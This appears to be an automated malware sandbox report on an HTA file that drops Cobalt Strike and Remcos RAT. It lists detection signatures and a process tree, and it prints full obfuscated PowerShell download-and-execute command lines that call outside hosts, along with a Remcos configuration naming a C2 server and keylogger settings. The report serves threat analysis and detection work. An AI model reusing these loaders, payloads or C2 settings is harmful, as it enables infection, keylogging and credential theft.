Edit tour
Windows
Analysis Report
greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7768 cmdline:
mshta.exe "C:\Users\ user\Deskt op\greatni cefeatures withsuperc odebnatura lthingsinl ineforgive n.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 7840 cmdline:
"C:\Window s\system32 \cmd.exe" "/C pOWERS heLL -eX byPASS -nop -W 1 -C deViCeCRE dENTIALdep loymEnt ; iNVOkE-E xpRESsIOn( $(iNvOke-e xprEsSION( '[sYsteM.T EXt.eNcODI NG]'+[Char ]58+[cHaR] 58+'UTf8.g Etstring([ SySTEm.con VErt]'+[Ch AR]58+[Cha r]0X3A+'Fr ombAsE64ST riNg('+[ch Ar]34+'JDR JRjZKICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI D0gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR kLXRZcGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW1lTUJ FckRFRklOS XRJT04gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gJ1tEbGxJb XBvcnQoIlV SbG1PTiIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWmJQZ 0Z0LHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBqW CxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgbFd1W HlFSFUsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBBY nQsSW50UHR yICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHBUQ ncpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbWUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInVVUyI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5BT WVTUEFjZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBjUCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtUGFzc1R ocnU7ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CQ0SUY2Sjo 6VVJMRG93b mxvYWRUb0Z pbGUoMCwia HR0cDovLzI zLjk1LjIzN S4yOS8xMTg vZnJlZXNpe mVkcmVzc2Z vcm5hdHVyY WxiZWF1dHl pbnRoaXNjY XNlZm9yeW9 1Z29vZC50S UYiLCIkRU5 WOkFQUERBV EFcZnJlZXN pemVkcmVzc 2Zvcm5hdHV yYWxiZWF1d HlpbnRoaXN jYXNlZm9ye W91LnZiUyI sMCwwKTtzd EFyVC1zbGV FcCgzKTtpb nZvS0UtZXh wckVTU2lvT iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAiJGV udjpBUFBEQ VRBXGZyZWV zaXplZHJlc 3Nmb3JuYXR 1cmFsYmVhd XR5aW50aGl zY2FzZWZvc nlvdS52YlM i'+[CHar]3 4+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7884 cmdline:
pOWERSheLL -e X by PASS -nop -W 1 - C de ViCeCREdEN TIALdeploy mEnt ; i NVOkE-ExpR ESsIOn($(i NvOke-expr EsSION('[s YsteM.TEXt .eNcODING] '+[Char]58 +[cHaR]58+ 'UTf8.gEts tring([SyS TEm.conVEr t]'+[ChAR] 58+[Char]0 X3A+'Fromb AsE64STriN g('+[chAr] 34+'JDRJRj ZKICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgYWRkLX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1lTUJFck RFRklOSXRJ T04gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgJ1 tEbGxJbXBv cnQoIlVSbG 1PTiIsICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWmJQZ0Z0 LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBqWCxz dHJpbmcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbFd1WHlF SFUsdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBBYnQs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHBUQncp OycgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5hbWUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg InVVUyIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLU5BTWVT UEFjZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BjUCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICQ0 SUY2Sjo6VV JMRG93bmxv YWRUb0ZpbG UoMCwiaHR0 cDovLzIzLj k1LjIzNS4y OS8xMTgvZn JlZXNpemVk cmVzc2Zvcm 5hdHVyYWxi ZWF1dHlpbn RoaXNjYXNl Zm9yeW91Z2 9vZC50SUYi LCIkRU5WOk FQUERBVEFc ZnJlZXNpem VkcmVzc2Zv cm5hdHVyYW xiZWF1dHlp bnRoaXNjYX NlZm9yeW91 LnZiUyIsMC wwKTtzdEFy VC1zbGVFcC gzKTtpbnZv S0UtZXhwck VTU2lvTiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiJGVudj pBUFBEQVRB XGZyZWVzaX plZHJlc3Nm b3JuYXR1cm FsYmVhdXR5 aW50aGlzY2 FzZWZvcnlv dS52YlMi'+ [CHar]34+' ))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 8008 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\eykjjr5p \eykjjr5p. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 8024 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SB0F9.tmp" "c:\Users \user\AppD ata\Local\ Temp\eykjj r5p\CSC29E 03D1348143 7180131853 2EC93FB.TM P" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 8136 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\frees izedressfo rnaturalbe autyinthis caseforyou .vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 8184 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $comicsver se = 'JGhl bGljb3Byb3 RlaWQgPSAn aHR0cHM6Ly 9yZXMuY2xv dWRpbmFyeS 5jb20vZHp2 YWk4NnVoL2 ltYWdlL3Vw bG9hZC92MT czNDA1MDk5 MS91bnhhb2 9peWt4Zm13 OXBhbjR6MS 5qcGcgJzsk bWV0YXBoeX RlID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDsk Y2hvdWwgPS AkbWV0YXBo eXRlLkRvd2 5sb2FkRGF0 YSgkaGVsaW NvcHJvdGVp ZCk7JHBvb2 tvbyA9IFtT eXN0ZW0uVG V4dC5FbmNv ZGluZ106Ol VURjguR2V0 U3RyaW5nKC RjaG91bCk7 JHJhbmdpbm VzcyA9ICc8 PEJBU0U2NF 9TVEFSVD4+ JzskeGFudG hhbGluZSA9 ICc8PEJBU0 U2NF9FTkQ+ Pic7JFBpem Fycm8gPSAk cG9va29vLk luZGV4T2Yo JHJhbmdpbm Vzcyk7JGhh bmdlciA9IC Rwb29rb28u SW5kZXhPZi gkeGFudGhh bGluZSk7JF BpemFycm8g LWdlIDAgLW FuZCAkaGFu Z2VyIC1ndC AkUGl6YXJy bzskUGl6YX JybyArPSAk cmFuZ2luZX NzLkxlbmd0 aDskc3ludG F4aW4gPSAk aGFuZ2VyIC 0gJFBpemFy cm87JGluc2 FsdmVhYmxl ID0gJHBvb2 tvby5TdWJz dHJpbmcoJF BpemFycm8s ICRzeW50YX hpbik7JHVu Y2x1dHRlci A9IC1qb2lu ICgkaW5zYW x2ZWFibGUu VG9DaGFyQX JyYXkoKSB8 IEZvckVhY2 gtT2JqZWN0 IHsgJF8gfS lbLTEuLi0o JGluc2Fsdm VhYmxlLkxl bmd0aCldOy RjYXRhc3Ry b3BoZSA9IF tTeXN0ZW0u Q29udmVydF 06OkZyb21C YXNlNjRTdH JpbmcoJHVu Y2x1dHRlci k7JG5lcGhy b2kgPSBbU3 lzdGVtLlJl ZmxlY3Rpb2 4uQXNzZW1i bHldOjpMb2 FkKCRjYXRh c3Ryb3BoZS k7JGNvbnZl cmJzID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JGNvbnZl cmJzLkludm 9rZSgkbnVs bCwgQCgnMC 9MV3pWcS9y L2VlLmV0c2 FwLy86c3B0 dGgnLCAnJG hhc3NsZWQn LCAnJGhhc3 NsZWQnLCAn JGhhc3NsZW QnLCAnQ2Fz UG9sJywgJy RoYXNzbGVk JywgJyRoYX NzbGVkJywn JGhhc3NsZW QnLCckaGFz c2xlZCcsJy RoYXNzbGVk JywnJGhhc3 NsZWQnLCck aGFzc2xlZC csJzEnLCck aGFzc2xlZC csJycpKTs= ';$eyeing = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($com icsverse)) ;Invoke-Ex pression $ eyeing MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 6348 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 6832 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |